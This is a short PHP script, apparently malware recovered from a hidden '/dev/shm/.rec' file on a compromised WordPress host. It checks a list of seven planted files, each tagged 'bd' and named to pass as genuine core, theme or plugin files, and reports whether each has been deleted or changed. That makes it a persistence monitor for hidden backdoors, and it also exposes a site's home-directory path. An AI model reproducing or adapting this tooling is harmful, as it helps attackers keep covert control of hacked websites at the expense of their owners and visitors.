File: //dev/shm/.rec
<?php $r = '/home/iqbalysd/public_html'; $x = ["/wp-includes/blocks/navigation-submenu.php"=>"bd@@230667674@@10547",
"/param.php"=>"bd@@229969373@@751",
"/wp-content/plugins/litespeed-cache/tpl/db_optm/Z.php"=>"bd@@235777531@@599",
"/wp-content/themes/neve/inc/customizer/controls/react/form.selector.php"=>"bd@@233711107@@701",
"/wp-includes/rest-api/endpoints/class-wp-rest-blocks-controller.php"=>"bd@@234143884@@3889",
"/wp-content/plugins/backup-backup/analyst/src/Notices/server.php"=>"bd@@232903460@@643",
"/wp-includes/customize/class-wp-customize-themes-section.php"=>"bd@@221639432@@7660"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');